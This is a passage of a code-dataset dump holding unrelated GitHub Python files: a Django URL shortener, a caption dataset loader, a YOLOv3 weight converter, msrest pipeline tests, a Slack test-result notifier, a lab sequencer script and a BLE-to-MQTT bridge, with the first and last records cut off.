STOP_FLAG in line_clean:\n break\n\n if SEP in line_clean:\n menu_item = line_chunks[0].split('] ')\n\n d = {}\n d['description'] = description_parse(menu_item[1])\n d['uuid'] = line_chunks[1].replace(\"\\'\", \"\")\n\n uuids.append(d)\n\n return proc, uuids\n","repo_name":"loads/loads-cli","sub_path":"loads/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"26328935678","text":"import os\nimport json\nimport numpy as np\nimport codecs\n\nimport torch.utils.data\n\nfrom caption.utils.inference import BOS, EOS, UNK\n\nclass CaptionDatasetBase(torch.utils.data.Dataset):\n def __init__(self, word2int_file, ref_caption_file=None, \n max_words_in_sent=20, is_train=False, return_label=False, _logger=None):\n if _logger is None:\n self.print_fn = print\n else:\n self.print_fn = _logger.info\n\n if word2int_file.endswith('json'):\n self.word2int = json.load(open(word2int_file))\n else:\n self.word2int = np.load(word2int_file)\n self.int2word = {i: w for w, i in self.word2int.items()}\n\n if ref_caption_file is not None:\n self.ref_captions = json.load(open(ref_caption_file))\n\n self.max_words_in_sent = max_words_in_sent\n self.is_train = is_train\n self.return_label = return_label\n\n def sent2int(self, str_sent):\n int_sent = [self.word2int.get(w, UNK) for w in str_sent.split()]\n return int_sent\n\n def pad_sents(self, int_sent, add_bos_eos=True):\n if add_bos_eos:\n sent = [BOS] + int_sent + [EOS]\n else:\n sent = int_sent\n sent = 
sent[:self.max_words_in_sent]\n        num_pad = self.max_words_in_sent - len(sent)\n        mask = [True]*len(sent) + [False] * num_pad\n        sent = sent + [EOS] * num_pad\n        return sent, mask\n\n    def pad_or_trim_feature(self, attn_ft, max_len, average=False):\n        seq_len, dim_ft = attn_ft.shape\n        # plain bool: the np.bool alias was deprecated and later removed from numpy\n        mask = np.zeros((max_len, ), bool)\n        \n        # pad\n        if seq_len < max_len:\n            new_ft = np.zeros((max_len, dim_ft), np.float32)\n            new_ft[:seq_len] = attn_ft\n            mask[:seq_len] = True\n        elif seq_len == max_len:\n            new_ft = attn_ft\n            mask[:] = True\n        # trim\n        else:\n            if average:\n                idxs = np.round(np.linspace(0, seq_len, max_len+1)).astype(np.int32)\n                new_ft = np.array([np.mean(attn_ft[idxs[i]: idxs[i+1]], axis=0) for i in range(max_len)])\n            else:\n                idxs = np.round(np.linspace(0, seq_len-1, max_len)).astype(np.int32)\n                new_ft = attn_ft[idxs]\n            mask[:] = True\n        return new_ft, mask\n\n    \n","repo_name":"cshizhe/asg2cap","sub_path":"caption/readers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"47"}
+{"seq_id":"34243916349","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom shortener.helper import CustomJsonResponse\n\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg import openapi\nimport string\nimport random\nfrom url_mapping.models import UrlMapping\nfrom django.conf import settings\nimport urllib.parse\nfrom django.shortcuts import redirect\n\nmy_domain = getattr(settings, 'DOMAIN') or 'http://127.0.0.1:8000'\n\n\nclass ShortenerView(APIView):\n    @swagger_auto_schema(operation_summary='S01-01 short url',\n                         operation_description='given url, return shorted url',\n                         request_body=openapi.Schema(\n                             type=openapi.TYPE_OBJECT,\n                             properties={\n                                 'url':\n                                 openapi.Schema(\n                                     type=openapi.TYPE_STRING,\n                                     description='url',\n                                     example='https://www.google.com'),\n                             }))\n    def post(self, request):\n        origin_url = request.data.get('url')\n        obj, created = UrlMapping.objects.get_or_create(origin_url=origin_url)\n        if created:\n            letters = string.ascii_letters\n            code = ''.join(random.choice(letters) for i in range(20))\n            obj.shortener_url = code\n            obj.save()\n        else:\n            code = obj.shortener_url\n        result = {\n            \"origin_url\":\n            origin_url,\n            \"short_url\":\n            urllib.parse.urljoin(my_domain, f'short/{obj.shortener_url}')\n        }\n        return CustomJsonResponse(result_data=result, return_message='success')\n\n\nclass RecoveryUrlView(APIView):\n    @swagger_auto_schema(\n        operation_summary='S01-02 recovery url', )\n    def get(self, request, shorted_url):\n        errors = {}\n        try:\n            obj = UrlMapping.objects.get(shortener_url=shorted_url)\n        except UrlMapping.DoesNotExist:\n            errors['url_error'] = f\"url does not exist.\"\n        except Exception as e:\n            errors['error'] = e\n        if errors:\n            return CustomJsonResponse(\n                result_data=errors,\n                return_message=\"can not find this url code\")\n        return redirect(obj.origin_url)\n        # result = {\"url\": obj.origin_url}\n        # return CustomJsonResponse(result_data=result, return_message='success')","repo_name":"johney4415/symphox","sub_path":"src/url_mapping/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"31967159466","text":"import setuptools\n\n#Get long description from readme file\nwith open(\"README.md\", 'r') as readme_file:\n    long_description = readme_file.read()\n\nsetuptools.setup(\n    name=\"InequalityMetrics\",\n    
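# the name here is the PyPI distribution name; the importable packages\n    # themselves are discovered separately by find_packages() below\n    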
version=\"1.0.4\",\n author=\"Tom Logan, Mitchell Anderson\",\n author_email=\"tom.logan@canterbury.ac.nz\",\n description=\"Inequality Metrics contains functions for the Kolm-Pollak, Atkinson EDE and Gini Index aproaches to calculating inequality distributions\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/michael-j-freeman/urutau-inequality-metrics\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=[\n 'scipy',\n 'numpy'\n ],\n python_requires='>=3',\n)\n\n#There are other things which can be modified","repo_name":"michael-j-freeman/urutau-inequality-metrics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23056265614","text":"prg_comment = \"\"\nprg_version = \"0.7\"\ndef program(prg, cmd):\n prg.add(0, \"OpticalBEC_2019-10-15\")\n prg.add(140100000, \"Synchronize.sub\")\n prg.add(140200000, \"+-1_mixture_preparation\")\n prg.add(142202000, \"TTL uW 2 ON\", enable=False)\n prg.add(142207000, \"DDS41_setfull\", ch0_amp=0, ch0_freq=0.000, ch1_freq=0.000, ch0_phase=0.000, ch1_phase=0.000, ch1_amp=0, functions=dict(ch0_freq=lambda x: 100e6 + cmd.get_var('uW_freq1')*1e3 + cmd.get_var('uW_Delta')*1e3, ch1_freq=lambda x: 100e6 + cmd.get_var('uW_freq2')*1e3 + cmd.get_var('uW_Delta')*1e3, ch0_phase=lambda x: cmd.get_var('beat_phase'), ch0_amp=lambda x: cmd.get_var('uW_amp1'), ch1_amp=lambda x: cmd.get_var('uW_amp2')), enable=False)\n prg.add(142209000, \"TTL uW 1 (100W) ON\", enable=False)\n prg.add(142215000, \"TTL uW 1 (100W) OFF\", enable=False)\n prg.add(142215200, \"Oscilloscope Trigger ON\", enable=False)\n prg.add(142216400, \"soliton_imaging\", enable=False)\n prg.add(142216400, \"transfer_m1to0\", enable=False)\n prg.add(142226400, \"Switch Off Dipole\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(142236400, \"transfer_m1to0\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(142246400, \"DDSpulse\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142246400, \"interferometer\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142246400, \"TTL uW 2 ON\")\n prg.add(142246400, \"TTL uW 2 OFF\", functions=dict(time=lambda x: x + cmd.get_var('uW_pulse')))\n prg.add(142249300, \"Oscilloscope Trigger ON\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(142249400, \"three_pictures_hamamatsu\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142249400, \"transfer_m1m2\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142249400, \"transfer_p1p2\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142249500, \"transfer_p1to0\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142249500, \"transfer_0to0\", enable=False)\n prg.add(142249500, \"two_photon_pulse_DDS\", functions=dict(time=lambda x: x - cmd.get_var('uW_pulse') + cmd.get_var('hold_time')), enable=False)\n prg.add(142249500, \"interferometer\", enable=False)\n prg.add(142249510, \"Oscilloscope Trigger ON\", enable=False)\n prg.add(142279510, \"TOF_Levitation\", 
functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(142282630, \"imaging_repump\", functions=dict(time=lambda x: x + cmd.get_var('tof') + cmd.get_var('hold_time')), enable=False)\n prg.add(142284730, \"three-pictures_VarProbeDet_190625\", functions=dict(time=lambda x: x + cmd.get_var('tof') + cmd.get_var('hold_time')))\n prg.add(142289050, \"Oscilloscope Trigger OFF\")\n prg.add(142307950, \"All uW OFF\", enable=False)\n prg.add(146284730, \"Cigar_beam_check\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(146294730, \"TTL uW 1 (100W) OFF\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(186294730, \"wait\")\n return prg\ndef commands(cmd):\n import numpy as np\n iters = np.linspace(0.000000, 0.100000, 10.000000)\n np.random.shuffle(iters)\n j = 0\n while(cmd.running):\n print('\\n-------o-------')\n uW_pulse = iters[j]\n cmd.set_var('uW_pulse', uW_pulse)\n print('\\n')\n print('Run #%d/%d, with variables:\\nuW_pulse = %g\\n'%(j+1, len(iters), uW_pulse))\n cmd._system.run_number = j\n cmd.run(wait_end=True, add_time=100)\n j += 1\n if j == len(iters):\n cmd._system.run_number = 0\n cmd.stop()\n return cmd\n","repo_name":"BEC-Trento/BEC2-data","sub_path":"programs/OpticalBEC_uW1phrabifreq.py","file_name":"OpticalBEC_uW1phrabifreq.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12765476788","text":"from collections.abc import Sequence\nfrom smtplib import SMTPException\n\nfrom django.core.mail.backends.base import BaseEmailBackend\nfrom django.core.mail.message import EmailMessage\nfrom django.db import transaction\n\nfrom organization.models import EmailLog\n\n\nclass DatabaseEmailBackend(BaseEmailBackend):\n \"\"\"\n A custom email backend that logs email failures to a database.\n \"\"\"\n\n def send_messages(self, email_messages: Sequence[EmailMessage]) -> int:\n \"\"\"\n Sends the provided list of email messages.\n\n If sending fails for a message, it creates a new `EmailLog` instance with the\n subject, recipient email address, and error message and saves it to the database.\n\n The database operations are wrapped in a transaction to ensure atomicity.\n\n Args:\n email_messages: A list of `EmailMessage` objects to send.\n\n Returns:\n The number of sent messages.\n \"\"\"\n\n num_sent = 0\n with transaction.atomic():\n for message in email_messages:\n try:\n message.send()\n num_sent += 1\n except SMTPException as email_error:\n email_log = EmailLog(\n subject=message.subject,\n to_email=\", \".join(message.to),\n error=str(email_error),\n )\n email_log.save()\n return num_sent\n","repo_name":"Monta-Application/Monta","sub_path":"server/backend/email_backend.py","file_name":"email_backend.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"9759369655","text":"import requests\nimport json\nimport sys\n\n\ndef fix_input_text(data: list) -> str:\n # Convert the input JSON string to a Python list\n input_list = json.loads(data)\n\n # Create a new list to store the fixed format dictionaries\n output_list = []\n\n # Iterate over each dictionary in the input list\n for item in input_list:\n # Extract the values from the dictionary\n axis_value = item['axis_value']\n outcome = item['outcome']\n test_details = item['test_details']\n\n # Create a new dictionary in the correct format\n new_item = {\n 'axis_value': 
axis_value,\n            'outcome': outcome,\n            'test_details': test_details\n        }\n\n        # Append the new dictionary to the output list\n        output_list.append(new_item)\n\n    # Convert the output list to JSON string in the correct format\n    output_json = json.dumps(output_list, indent=4)\n\n    return output_json\n\ndef prepare_message(data, app_name, app_version) -> str:\n    message = \"\"\n    # default so the check below is safe when no app name was supplied\n    app_details = \"\"\n    \n    if app_name != \"\":\n        app_details = app_name\n        if app_version != \"\":\n            app_details += \" - \" + app_version\n    \n    if app_details != \"\":\n        message += \"> *Version*\\n\"\n        message += \"> \" + app_details + \"\\n\"\n\n    message += \"> *Test Details*\\n\"\n    for item in data:\n        name = item[\"axis_value\"]\n        outcome = item[\"outcome\"]\n        if outcome == \"Passed\":\n            mark = \":white_check_mark:\"\n        elif outcome == \"Failed\":\n            mark = \":x:\"\n        else:\n            mark = \":warning:\"\n        message += \"> Device: \" + name + \" - \" + outcome + \" \" + mark + \"\\n\"\n    \n    return message\n\n\ndef send_message(message: str):\n    payload = {\n        \"text\": message\n    }\n    headers = {\n        \"Content-Type\": \"application/json\"\n    }\n    \n    response = requests.post(slack_webhook_url, data=json.dumps(payload), headers=headers)\n    if response.status_code != 200:\n        print(f\"Error sending message to Slack: {response.text}\")\n    else:\n        print(\"Message sent successfully!\")\n\n\n#### Script starts here ####\n\n# get the input file\ninput_file = sys.argv[1]\n\n# get the slack webhook url\nslack_webhook_url = sys.argv[2]\n\n# get the app name\nif len(sys.argv) > 3:\n    app_name = sys.argv[3]\nelse:\n    app_name = \"\"\n\n# get the app version\nif len(sys.argv) > 4:\n    app_version = sys.argv[4]\nelse:\n    app_version = \"\"\n\nwith open(input_file) as f:\n    try:\n        print(\"Reading input file...\")\n        input = f.read()\n        fixed_input = fix_input_text(input)\n\n        last_input = fixed_input\n\n        print(f\"Input: {input}\")\n        print(f\"Fixed input: {last_input}\")\n        \n        data = json.loads(last_input)\n        \n        message = prepare_message(data, app_name, app_version)\n\n        print(\"Sending message to Slack...\")\n        send_message(message)\n\n        \n    except Exception as e:\n        print(\"Error reading input file or sending message to Slack: \" + str(e))\n        \n","repo_name":"muhammed9865/Robo-Test-Automation","sub_path":"script/post_result_slack.py","file_name":"post_result_slack.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"1071791238","text":"from selenium import webdriver\nimport time\n\nfrom selenium.webdriver import ActionChains\n\ndriver = webdriver.Chrome(executable_path=\"E:\\Selenium_using_python\\chromedriver.exe\")\ndriver.get(\"https://www.nationsonline.org/oneworld/countries_of_the_world.htm\")\n\n#Scroll by pixel value\n# time.sleep(3)\n# driver.execute_script(\"window.scrollBy(0,3000)\",\"\")\n# time.sleep(5)\n\n# Scroll down page until element found\n# flag = driver.find_element_by_xpath(\"//a[normalize-space()='Colombia']\")\n# driver.execute_script(\"arguments[0].scrollIntoView();\",flag)\n# time.sleep(10)\n\n#Scroll down till page end\n# driver.execute_script(\"window.scrollBy(0,document.body.scrollHeight)\")\n# time.sleep(10)\n\n#Using Action Class\nl=driver.find_element_by_xpath(\"//a[normalize-space()='Colombia']\")\na = 
ActionChains(driver)\na.move_to_element(l).perform()\ntime.sleep(10)\n\ndriver.close()","repo_name":"Aishwarya4/selenium-python","sub_path":"Selenium_Projects/Scrolling.py","file_name":"Scrolling.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"7655937461","text":"from tkinter import *\nfrom tkinter.ttk import *\n\n#root\nroot = Tk()\nroot.title(\"UGh\")\nroot.geometry('500x500')\n\ncombo = Combobox(root)\ncombo['values'] = (1,2,3,4,5, \"Text\")\ncombo.current(1)\ncombo.grid(column=0,row=0)\n\n#chk_state = BooleanVar()\n#chk_state.set(True) #set check state\nchk_state = IntVar()\n\n#chk_state.set(0) #uncheck\n\nchk_state.set(1) #check\nchk = Checkbutton(root, text='Choose', var=chk_state)\nchk.grid(column=1, row=1)\n\nroot.mainloop()\n","repo_name":"Cabandadan/waifu-bot","sub_path":"tests/learn2.py","file_name":"learn2.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"72304715982","text":"try:\n from unittest import mock\nexcept ImportError:\n import mock\n\nimport requests\n\nimport pytest\n\nfrom msrest.exceptions import DeserializationError\nfrom msrest.universal_http import (\n ClientRequest,\n ClientResponse,\n HTTPClientResponse,\n)\nfrom msrest.universal_http.requests import RequestsClientResponse\n\nfrom msrest.pipeline import (\n Response,\n Request\n)\nfrom msrest.pipeline.universal import (\n HTTPLogger,\n RawDeserializer,\n UserAgentPolicy\n)\n\ndef test_user_agent():\n\n with mock.patch.dict('os.environ', {'AZURE_HTTP_USER_AGENT': \"mytools\"}):\n policy = UserAgentPolicy()\n assert policy.user_agent.endswith(\"mytools\")\n\n request = ClientRequest('GET', 'http://127.0.0.1/')\n policy.on_request(Request(request))\n assert request.headers[\"user-agent\"].endswith(\"mytools\")\n\n@mock.patch('msrest.http_logger._LOGGER')\ndef test_no_log(mock_http_logger):\n universal_request = ClientRequest('GET', 'http://127.0.0.1/')\n request = Request(universal_request)\n http_logger = HTTPLogger()\n response = Response(request, ClientResponse(universal_request, None))\n\n # By default, no log handler for HTTP\n http_logger.on_request(request)\n mock_http_logger.debug.assert_not_called()\n http_logger.on_response(request, response)\n mock_http_logger.debug.assert_not_called()\n mock_http_logger.reset_mock()\n\n # I can enable it per request\n http_logger.on_request(request, **{\"enable_http_logger\": True})\n assert mock_http_logger.debug.call_count >= 1\n http_logger.on_response(request, response, **{\"enable_http_logger\": True})\n assert mock_http_logger.debug.call_count >= 1\n mock_http_logger.reset_mock()\n\n # I can enable it per request (bool value should be honored)\n http_logger.on_request(request, **{\"enable_http_logger\": False})\n mock_http_logger.debug.assert_not_called()\n http_logger.on_response(request, response, **{\"enable_http_logger\": False})\n mock_http_logger.debug.assert_not_called()\n mock_http_logger.reset_mock()\n\n # I can enable it globally\n http_logger.enable_http_logger = True\n http_logger.on_request(request)\n assert mock_http_logger.debug.call_count >= 1\n http_logger.on_response(request, response)\n assert mock_http_logger.debug.call_count >= 1\n mock_http_logger.reset_mock()\n\n # I can enable it globally and override it locally\n http_logger.enable_http_logger = True\n http_logger.on_request(request, **{\"enable_http_logger\": False})\n 
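# the explicit per-request False must override the global True, so no\n    # HTTP logging may happen here either\n    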
mock_http_logger.debug.assert_not_called()\n http_logger.on_response(request, response, **{\"enable_http_logger\": False})\n mock_http_logger.debug.assert_not_called()\n mock_http_logger.reset_mock()\n\n\ndef test_raw_deserializer():\n raw_deserializer = RawDeserializer()\n\n def build_response(body, content_type=None):\n class MockResponse(HTTPClientResponse):\n def __init__(self, body, content_type):\n super(MockResponse, self).__init__(None, None)\n self._body = body\n if content_type:\n self.headers['content-type'] = content_type\n\n def body(self):\n return self._body\n return Response(None, MockResponse(body, content_type))\n\n # I deserialize XML\n response = build_response(b\"\", content_type=\"application/xml\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result.tag == \"groot\"\n\n # The basic deserializer works with unicode XML\n result = raw_deserializer.deserialize_from_text(u'', content_type=\"application/xml\")\n assert result.attrib[\"language\"] == u\"français\"\n\n # Catch some weird situation where content_type is XML, but content is JSON\n response = build_response(b'{\"ugly\": true}', content_type=\"application/xml\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"ugly\"] is True\n\n # Be sure I catch the correct exception if it's neither XML nor JSON\n with pytest.raises(DeserializationError):\n response = build_response(b'gibberish', content_type=\"application/xml\")\n raw_deserializer.on_response(None, response, stream=False)\n with pytest.raises(DeserializationError):\n response = build_response(b'{{gibberish}}', content_type=\"application/xml\")\n raw_deserializer.on_response(None, response, stream=False)\n\n # Simple JSON\n response = build_response(b'{\"success\": true}', content_type=\"application/json\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"success\"] is True\n\n # Simple JSON with complex content_type\n response = build_response(b'{\"success\": true}', content_type=\"application/vnd.microsoft.appconfig.kv+json\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"success\"] is True\n\n # JSON with UTF-8 BOM\n response = build_response(b'\\xef\\xbb\\xbf{\"success\": true}', content_type=\"application/json; charset=utf-8\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"success\"] is True\n\n # For compat, if no content-type, decode JSON\n response = build_response(b'\"data\"')\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result == \"data\"\n\n # Try with a mock of requests\n\n req_response = requests.Response()\n req_response.headers[\"content-type\"] = \"application/json\"\n req_response._content = b'{\"success\": true}'\n req_response._content_consumed = True\n response = Response(None, RequestsClientResponse(None, req_response))\n\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"success\"] is 
True\n","repo_name":"Azure/msrest-for-python","sub_path":"tests/test_universal_pipeline.py","file_name":"test_universal_pipeline.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"47"} +{"seq_id":"19762191147","text":"'''\nCreated on 2012-11-24\n\n@author: bkybar\n'''\nimport xml.etree.ElementTree as ET\nfrom src.ReGEN.IO.XMLModificationWriter import XMLModificationWriter\n\nclass XMLStoryGraphWriter():\n \n \"\"\"\n Initialize our Social Graph Writer\n \"\"\"\n def __init__(self, path, name, graph):\n self._filename= path + name\n self._path = path\n self._graph = graph\n \n \"\"\"\n Write our graph to the file\n \"\"\"\n def writeGraph(self):\n \n #Write our root head\n root = ET.Element('graph')\n root.attrib['name'] = self._graph.get_name()\n root.attrib['type'] = \"Story_Graph\"\n #Write our nodes\n nodes = ET.SubElement(root, 'nodes')\n for node in self._graph.get_nodes():\n new_node = ET.SubElement(nodes, 'node')\n new_node.attrib['name'] = node.get_name()\n \n #Write the target\n target = ET.SubElement(new_node, 'target')\n target.text = node.get_target().get_name()\n\n #Write the attributes\n for attribute in node.get_attributes():\n \n #A Special Case for Node_Type\n if attribute == \"Node_Type\":\n nodetype = ET.SubElement(new_node, 'nodetype')\n nodetype.text = node.get_attributes()[attribute]\n else:\n attr = ET.SubElement(new_node, 'attr')\n attr.attrib['name'] = attribute\n attr.attrib['type'] = type(node.get_attributes()[attribute]).__name__\n \n value = ET.SubElement(attr, 'value')\n value.text = str(node.get_attributes()[attribute])\n \n #Check for modifications\n if not node.get_modification() == None:\n modification_name = node.get_name() + \"_Modification.xml\"\n modification_filename = self._path + \"/Modifications/\" + modification_name\n new_node.attrib['modification'] = modification_name\n modification_writer = XMLModificationWriter(modification_filename, node.get_modification())\n modification_writer.writeModification()\n else:\n new_node.attrib['modification'] = 'None'\n \n #Write our connections\n connections = ET.SubElement(root, 'connections')\n for edge in self._graph.get_edges():\n \n #Make the connection\n connection = ET.SubElement(connections, 'connection')\n connection.attrib['from'] = edge.get_from_node().get_name()\n connection.attrib['to'] = edge.get_to_node().get_name()\n \n #Set the relation\n relation = ET.SubElement(connection, 'relation')\n \n if edge.get_key() == None:\n relation.attrib[\"none\"] = \"none\"\n else:\n relation.attrib[edge.get_key()] = edge.get_value()\n \n #Write our xml to a file\n tree = ET.ElementTree(root)\n tree.write(self._filename + \".xml\")\n ","repo_name":"QuinnKybartas/ReGEN","sub_path":"ReGEN-Python/src/ReGEN/IO/XMLStoryGraphWriter.py","file_name":"XMLStoryGraphWriter.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"41704929879","text":"import os\nimport sys\nimport wget\nimport time\nimport argparse\nimport tensorflow as tf\nfrom core import yolov3, utils\n\n\nclass parser(argparse.ArgumentParser):\n\n def __init__(self,description):\n super(parser, self).__init__(description)\n\n self.add_argument(\n \"--ckpt_file\", \"-cf\", default='./checkpoint/yolov3.ckpt', type=str,\n help=\"[default: %(default)s] The checkpoint file ...\",\n metavar=\"\",\n )\n\n self.add_argument(\n \"--weights_path\", \"-wp\", 
default='./checkpoint/yolov3.weights', type=str,\n help=\"[default: %(default)s] Download binary file with desired weights\",\n metavar=\"\",\n )\n\n self.add_argument(\n \"--convert\", \"-cv\", action='store_true',\n help=\"[default: %(default)s] Downloading yolov3 weights and convert them\",\n )\n\n self.add_argument(\n \"--freeze\", \"-fz\", action='store_true',\n help=\"[default: %(default)s] freeze the yolov3 graph to pb ...\",\n )\n\n self.add_argument(\n \"--image_size\", \"-is\", default=416, type=int,\n help=\"[default: %(default)s] The image size, 416 or 608\",\n metavar=\"\",\n )\n\n self.add_argument(\n \"--iou_threshold\", \"-it\", default=0.5, type=float,\n help=\"[default: %(default)s] The iou_threshold for gpu nms\",\n metavar=\"\",\n )\n\n self.add_argument(\n \"--score_threshold\", \"-st\", default=0.5, type=float,\n help=\"[default: %(default)s] The score_threshold for gpu nms\",\n metavar=\"\",\n )\n\n\ndef main(argv):\n\n flags = parser(description=\"freeze yolov3 graph from checkpoint file\").parse_args()\n classes = utils.read_coco_names(\"./data/coco.names\")\n num_classes = len(classes)\n SIZE = flags.image_size\n print(\"=> the input image size is [%d, %d]\" %(SIZE, SIZE))\n model = yolov3.yolov3(num_classes)\n\n with tf.Graph().as_default() as graph:\n sess = tf.Session(graph=graph)\n inputs = tf.placeholder(tf.float32, [1, SIZE, SIZE, 3]) # placeholder for detector inputs\n\n with tf.variable_scope('yolov3'):\n feature_map = model.forward(inputs, is_training=False)\n\n boxes, confs, probs = model.predict(feature_map)\n scores = confs * probs\n print(\"=>\", boxes, scores)\n boxes, scores, labels = utils.gpu_nms(boxes, scores, num_classes,\n score_thresh=flags.score_threshold,\n iou_thresh=flags.iou_threshold)\n print(\"=>\", boxes, scores, labels)\n feature_map_1, feature_map_2, feature_map_3 = feature_map\n print(\"=>\", feature_map_1, feature_map_2, feature_map_3)\n saver = tf.train.Saver(var_list=tf.global_variables(scope='yolov3'))\n\n if flags.convert:\n if not os.path.exists(flags.weights_path):\n url = 'https://github.com/YunYang1994/tensorflow-yolov3/releases/download/v1.0/yolov3.weights'\n for i in range(3):\n time.sleep(1)\n print(\"=> %s does not exists ! \" %flags.weights_path)\n print(\"=> It will take a while to download it from %s\" %url)\n print('=> Downloading yolov3 weights ... 
')\n wget.download(url, flags.weights_path)\n\n load_ops = utils.load_weights(tf.global_variables(scope='yolov3'), flags.weights_path)\n sess.run(load_ops)\n save_path = saver.save(sess, save_path=flags.ckpt_file)\n print('=> model saved in path: {}'.format(save_path))\n\n if flags.freeze:\n saver.restore(sess, flags.ckpt_file)\n print('=> checkpoint file restored from ', flags.ckpt_file)\n utils.freeze_graph(sess, './checkpoint/yolov3_cpu_nms.pb', [\"concat_9\", \"mul_6\"])\n utils.freeze_graph(sess, './checkpoint/yolov3_gpu_nms.pb', [\"concat_10\", \"concat_11\", \"concat_12\"])\n utils.freeze_graph(sess, './checkpoint/yolov3_feature.pb', [\"yolov3/yolo-v3/feature_map_1\",\n \"yolov3/yolo-v3/feature_map_2\",\n \"yolov3/yolo-v3/feature_map_3\",])\n\n\nif __name__ == \"__main__\": main(sys.argv)\n\n\n\n","repo_name":"ArtechStark/yolo_v3_tensorflow","sub_path":"convert_weight.py","file_name":"convert_weight.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"47"} +{"seq_id":"2737060010","text":"# https://github.com/eclipse/paho.mqtt.python\nimport paho.mqtt.client as MQTT\nfrom paho.mqtt.client import MQTTv311\n\nfrom os import path\nimport time\nimport traceback\n\nfrom bits import Bits\nfrom colours import *\nfrom controller import Controller\nfrom input_controller import InputController\n\nclass BLE2MQTT:\n def __init__(self, name):\n self.ble_name = name\n self.topic_base = \"-\".join(self.ble_name.split(' '))\n\n self.mqtt = MQTT.Client(client_id=self.name(), clean_session=True, userdata=None, protocol=MQTTv311, transport=\"tcp\")\n self.mqtt.will_set(self.topic(\"connected\"), payload=b\"false\", qos=0, retain=True)\n\n self.ble_connected = False\n self.mqtt_connected = False\n\n self.ble_ctrl = None\n\n def __del__(self):\n if self.ble_ctrl:\n del self.ble_ctrl\n if self.mqtt_connected:\n self.mqtt.loop_stop()\n self.mqtt.disconnect()\n\n def _log(self, msg):\n print(\"{0} {1}\".format(self, msg))\n\n def _logble(self, msg):\n self._log(\"[{0}] {1}\".format(style(\"BLE\", Colours.FG.CYAN), msg))\n\n def _logmqtt(self, msg):\n self._log(\"[{0}] {1}\".format(style(\"MQTT\", Colours.FG.BLUE), msg))\n\n def _error(self, e=None, tb=True):\n if e:\n self._log(style(type(e).__name__, Colours.FG.RED) + \": {}\".format(e))\n if tb:\n self._log(style(traceback.format_exc(), Colours.FG.BRIGHT_MAGENTA))\n else:\n self._log(style(\"Unknown error\", Colours.FG.RED))\n\n def __str__(self):\n return style(\"{0}\".format(self.name()), Colours.FG.YELLOW)\n\n def __repr__(self):\n return style(\"<{0}, ble={1}, mqtt={2}>\".format(self.name(), self.ble_connected, self.mqtt_connected), Colours.FG.YELLOW)\n\n def topic(self, name):\n return path.join(self.topic_base, name)\n\n def name(self):\n return self.topic_base\n\n ###########################################################################\n ## BLUETOOTH\n\n def ble_connect(self):\n try:\n self._logble(\"Attempting connect...\")\n self.ble_ctrl = InputController(ctrl_name=self.ble_name)\n except Exception as e:\n self._error(e, tb=False)\n self.ble_connected = False\n else:\n self._logble(style(\"Connected\", Colours.FG.GREEN))\n self.ble_connected = True # OK\n\n def ble_get(self):\n \"\"\"Returns topic, value pair\"\"\"\n try:\n return 